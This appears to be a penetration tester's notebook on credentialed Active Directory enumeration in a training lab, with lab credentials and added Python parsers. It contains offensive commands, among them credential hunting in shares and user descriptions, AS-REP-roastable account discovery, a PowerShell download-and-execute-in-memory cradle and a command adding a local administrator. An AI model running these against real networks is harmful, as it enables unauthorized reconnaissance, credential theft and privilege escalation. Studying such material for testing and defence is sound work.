Martian Defense NoteBook

Credentialed Enumeration

Credentialed Enumeration - Linux

CrackMapExec

Domain User Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users

Domain Groups Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups

Domain Logged On Users (requires local admin rights on the target hosts)

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users

Domain Share Searching

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap

List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>

Recursive List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only

RPCclient

User Enumeration by RID

# Connect with the credentials (use -U "" -N for a null session where one is allowed), list users with their RIDs, then query a single account by RID
rpcclient -U "INLANEFREIGHT\forend%Klmcargo2" <IP>
rpcclient $> enumdomusers
rpcclient $> queryuser <RID>
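The following Python helper is an added example and not part of the original notebook. It parses the output of rpcclient's enumdomusers command (one `user:[name] rid:[0xHEX]` line per account), converts the hex RIDs to decimal, flags the well-known RIDs, builds object SIDs from the domain SID and generates the matching queryuser commands. The sample output and the domain SID are constructed for the example; the well-known RID values are the standard ones (500 Administrator, 501 Guest, 502 krbtgt, 512 Domain Admins, 519 Enterprise Admins).

```python
import re

# Well-known RIDs worth flagging in any enumdomusers listing.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    502: "krbtgt",
    512: "Domain Admins",
    519: "Enterprise Admins",
}

# rpcclient prints one "user:[name] rid:[0xHEX]" line per account.
ENUMDOMUSERS_RE = re.compile(
    r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]"
)


def parse_enumdomusers(output):
    """Return (samaccountname, rid) pairs with the RID converted from hex to decimal."""
    users = []
    for line in output.splitlines():
        m = ENUMDOMUSERS_RE.search(line)
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def rid_to_sid(domain_sid, rid):
    """Build an object SID from the domain SID (as shown by `lsaquery`) and a RID."""
    return f"{domain_sid}-{rid}"


def queryuser_commands(users):
    """rpcclient's queryuser takes the RID in hex; emit one command per account."""
    return [f"queryuser 0x{rid:x}" for _, rid in users]


def flag_well_known(users):
    """Map account names to a label for every RID that is a well-known one."""
    return {name: WELL_KNOWN_RIDS[rid] for name, rid in users if rid in WELL_KNOWN_RIDS}


# Constructed sample output (not captured from a real host).
SAMPLE = """\
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[forend] rid:[0x457]
user:[svc_backup] rid:[0x4a3]
"""

# Constructed domain SID used only for the demonstration.
DOMAIN_SID = "S-1-5-21-1234567890-1234567890-1234567890"

if __name__ == "__main__":
    users = parse_enumdomusers(SAMPLE)
    for name, rid in users:
        tag = WELL_KNOWN_RIDS.get(rid, "")
        print(f"{name:<16} RID {rid:<6} SID {rid_to_sid(DOMAIN_SID, rid)} {tag}")
    print("\n".join(queryuser_commands(users)))
```

Feed it the saved output of enumdomusers (for example from `rpcclient ... -c enumdomusers`) and paste the generated queryuser lines back into an rpcclient session; the decimal RIDs are what you need when comparing against SIDs seen in ACLs or BloodHound data.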

WindapSearch

Search Domain Admins

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

Search Privileged Users

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

BloodHound-py

Enumerating Everything

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all 

Credentialed Enumeration - Windows

Active Directory PowerShell Module

# Import Module
Import-Module ActiveDirectory

Domain Info

Get-ADDomain

Users Info

Get-ADUser -Filter *

Trust Relations

Get-ADTrust -Filter *

Group Info

Get-ADGroup -Filter * | select name

Detailed Group Info

Get-ADGroup -Identity <group-name>

Group Membership

Get-ADGroupMember -Identity <group-name>

PowerView

Domain Information

Get-Domain

Show Domain Controller

Get-DomainController

Show all Users

Get-DomainUser

Show All Computers

Get-DomainComputer

Show all Groups

Get-DomainGroup

Show OU objects in AD

Get-DomainOU

Find ACLs that grant modification rights to non-built-in principals

Find-InterestingDomainAcl

Show members of a specific domain group

Get-DomainGroupMember

Show all GPO

Get-DomainGPO

Show User GPO Rights

# Change this to the user
$sid=Convert-NameToSid "Domain Users"

# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Show Domain Policy

Get-DomainPolicy

Show Local Groups

Get-NetLocalGroup

Show members of a specific local group

Get-NetLocalGroupMember

Find interesting files (by name) on accessible domain shares

Find-InterestingDomainShareFile

Find machines where the current user has local admin access

Find-LocalAdminAccess

Show Domain Trust

Get-DomainTrust 

Show all forest trusts for the current forest or a specified forest

Get-ForestTrust

Map all reachable domain trusts

Get-DomainTrustMapping

Find Passwords in User Description Fields

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

Find PASSWD_NOTREQD Users (blank password allowed)

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Find DONT_REQ_PREAUTH Users (AS-REP roastable)

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
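The three PowerView one-liners above (description search, PASSWD_NOTREQD, DONT_REQ_PREAUTH) all work off the same two attributes: the userAccountControl bitmask and the free-text description. The Python block below is an added example, not part of the original page or of PowerView, that decodes the bitmask and runs the same triage over a set of user records. The flag values are the standard ADS_USER_FLAG_ENUM ones; the user records and the description text are constructed for the example, and the password-hint regex is a heuristic of the author's choosing.

```python
import re

# userAccountControl bit flags (subset of ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Heuristic (assumption, not an AD standard): description text that mentions a password or credential.
PASSWORD_HINT_RE = re.compile(r"pass(word|wd)?|pwd|cred", re.IGNORECASE)


def decode_uac(value):
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def has_flag(value, flag_name):
    bit = next(b for b, n in UAC_FLAGS.items() if n == flag_name)
    return bool(value & bit)


def triage(records):
    """Flag AS-REP roastable accounts, blank-password accounts and suspicious descriptions."""
    findings = []
    for r in records:
        uac = r["userAccountControl"]
        name = r["samaccountname"]
        enabled = not has_flag(uac, "ACCOUNTDISABLE")
        # Only enabled accounts can be AS-REP roasted; disabled ones get no TGT.
        if has_flag(uac, "DONT_REQ_PREAUTH") and enabled:
            findings.append((name, "AS-REP roastable (DONT_REQ_PREAUTH)"))
        if has_flag(uac, "PASSWD_NOTREQD"):
            findings.append((name, "PASSWD_NOTREQD (empty password allowed)"))
        desc = r.get("description") or ""
        if PASSWORD_HINT_RE.search(desc):
            findings.append((name, f"description may contain a credential: {desc!r}"))
    return findings


# Constructed sample records shaped like LDAP results (not from a real domain).
SAMPLE_USERS = [
    {"samaccountname": "forend", "userAccountControl": 0x200, "description": None},
    {"samaccountname": "svc_backup", "userAccountControl": 0x400200, "description": "Backup service"},
    {"samaccountname": "old_svc", "userAccountControl": 0x400202, "description": "Retired"},
    {"samaccountname": "tmp_user", "userAccountControl": 0x10220, "description": None},
    {"samaccountname": "helpdesk", "userAccountControl": 0x200, "description": "Temp password: Welcome1!"},
]

if __name__ == "__main__":
    for r in SAMPLE_USERS:
        print(f"{r['samaccountname']:<12} {decode_uac(r['userAccountControl'])}")
    for name, why in triage(SAMPLE_USERS):
        print(f"[!] {name}: {why}")
```

Any LDAP dump (ldapsearch, windapsearch, bloodhound-python JSON) that preserves the numeric userAccountControl can be loaded into `records` in this shape; the point of decoding the bitmask yourself is that a raw value like 0x10220 tells you nothing until it is split into NORMAL_ACCOUNT, PASSWD_NOTREQD and DONT_EXPIRE_PASSWORD.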

Snaffler

https://github.com/SnaffCon/Snaffler

Snaffler helps acquire credentials or other sensitive data in an Active Directory environment. It obtains a list of hosts within the domain, enumerates those hosts for shares and readable directories, and then scans the files it finds for content that looks interesting (keys, config files, credentials).

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

Credentialed Enumeration With Built-In Tools

Basic Enumeration Commands

# Prints the PC's Name
hostname 

# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version

# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn

PowerShell Enumeration Commands

# Lists available modules loaded for use.
Get-Module 

# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List 

# Changes the execution policy for the current process only (-Scope Process). It reverts when the process exits, so no persistent change is made on the host.
Set-ExecutionPolicy Bypass -Scope Process

# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value

# Quick way to download a script with PowerShell and execute it in memory without writing it to disk.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

# Status Firewall
netsh advfirewall show allprofiles

# Status Windows Defender
Get-MpComputerStatus

Net Commands

# Information about password requirements
net accounts

# Password and lockout policy
net accounts /domain

# Information about domain groups
net group /domain

# List users with domain admin privileges
net group "Domain Admins" /domain

# List computer accounts joined to the domain
net group "domain computers" /domain

# List domain controller computer accounts
net group "Domain Controllers" /domain

# List the users that belong to a given domain group
net group <domain_group_name> /domain

# List domain groups
net groups /domain

# List users that belong to the Administrators group on the domain (the Domain Admins group is included here by default)
net localgroup administrators /domain

# Add a user to the local Administrators group (modifies the host and requires admin rights; not an enumeration step)
net localgroup administrators [username] /add

# Check current shares
net share

# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain

# List all users of the domain
net user /domain

# List computers visible on the network (use net view /domain:<domain> for a specific domain's computers)
net view
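When the net commands above are run on many hosts or many groups, the raw output has to be parsed before it is useful; net.exe prints group members in fixed 25-character columns, so splitting on whitespace breaks on names that contain a space. The Python block below is an added example, not part of the original page, that parses `net group "<group>" /domain` output by column and compares the members against a baseline to flag unexpected privileged accounts. The sample output is constructed to match net.exe's layout, and the column width is an assumption based on that layout.

```python
COLUMN_WIDTH = 25  # net.exe prints member names in fixed 25-character columns (assumed layout)


def group_name(output):
    """Return the group name from the 'Group name' header line, or None."""
    for line in output.splitlines():
        if line.startswith("Group name"):
            return line[len("Group name"):].strip()
    return None


def parse_net_group(output):
    """Return the member names listed under 'Members' in `net group ... /domain` output."""
    members = []
    in_members = False
    for line in output.splitlines():
        stripped = line.strip()
        if stripped == "Members":
            in_members = True
            continue
        if not in_members:
            continue
        # Skip the blank line and the dashed separator that follow the header.
        if not stripped or stripped.startswith("-"):
            continue
        if stripped.startswith("The command completed"):
            break
        # Slice by column rather than splitting on whitespace.
        for i in range(0, len(line), COLUMN_WIDTH):
            name = line[i:i + COLUMN_WIDTH].strip()
            if name:
                members.append(name)
    return members


def unexpected_members(members, baseline):
    """Members of the group that are not in the expected baseline, sorted."""
    return sorted(set(members) - set(baseline))


# Constructed sample output in net.exe's layout (not captured from a real domain).
SAMPLE = "\n".join([
    "Group name     Domain Admins",
    "Comment        Designated administrators of the domain",
    "",
    "Members",
    "",
    "-" * 79,
    f"{'Administrator':<25}{'forend':<25}svc_sql",
    "The command completed successfully.",
    "",
])

if __name__ == "__main__":
    members = parse_net_group(SAMPLE)
    print(f"{group_name(SAMPLE)}: {members}")
    print("unexpected:", unexpected_members(members, ["Administrator"]))
```

Redirect the command output to a file (`net group "Domain Admins" /domain > da.txt`) and pass its contents to `parse_net_group`; the baseline comparison is equally useful from the defensive side as a cheap check that nobody has been added to Domain Admins since the last review.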